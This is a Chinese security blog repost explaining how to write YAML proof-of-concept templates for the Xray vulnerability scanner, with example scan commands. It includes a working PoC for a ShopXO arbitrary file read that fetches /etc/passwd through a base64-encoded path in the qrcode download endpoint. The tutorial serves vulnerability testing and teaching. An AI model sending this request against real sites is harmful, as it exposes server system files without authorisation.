Xray poc简单编写

admin
admin
admin
139136
文章
114
评论
2023年11月24日00:39:32评论21 views字数 1057阅读3分31秒阅读模式

Xray poc简单编写

Xray是什么

xray 是一款功能强大的安全评估工具,由多名经验丰富的一线安全从业者呕心打造而成,主要特性有:

检测速度快。发包速度快; 漏洞检测算法效率高。

支持范围广。大至 OWASP Top 10 通用漏洞检测,小至各种 CMS 框架 POC,均可以支持。

代码质量高。编写代码的人员素质高, 通过 Code Review、单元测试、集成测试等多层验证来提高代码可靠性。

高级可定制。通过配置文件暴露了引擎的各种参数,通过修改配置文件可以客制化功能。

安全无威胁。xray 定位为一款安全辅助评估工具,而不是攻击工具,内置的所有 payload 和 poc 均为无害化检查。

Xray poc简单编写
#Github下载: https://github.com/chaitin/xray/releases (国外速度快)#CT stack下载: https://stack.chaitin.com/tool/detail?id=1 (国内速度快)#下载对应系统的版本后,来查看下 xray 的版本号。#参考https://docs.xray.coolhttps://stack.chaitin.com/tool/detail/1
Xray poc简单编写
Xray poc简单编写

✨Xray 漏洞验证

#写yml poc文件,单个url检测./xray_darwin_amd64 webscan --plugins phantasm --poc ./111.yml --url http://192.168.130.130:47984/#开启debug看响应包./xray_darwin_amd64 --log-level debug webscan --plugins phantasm --poc ./111.yml --url http://192.168.130.130:47984/

shopxo 文件读取:保存成111.yml

name: poc-yaml-testtransport: httprules:  r0:    request:      method: GET      path: /public/index.php?s=/index/qrcode/download/url/L2V0Yy9wYXNzd2Q=    expression: >-      response.status == 200 &&      "nologin:.*?:[0-9]*:[0-9]*:".bmatches(response.body)expression: r0()detail:  author: aa11le  links:    - test

Xray poc简单编写



原文始发于微信公众号(echoabced):Xray poc简单编写

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年11月24日00:39:32
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Xray poc简单编写https://cn-sec.com/archives/2234032.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息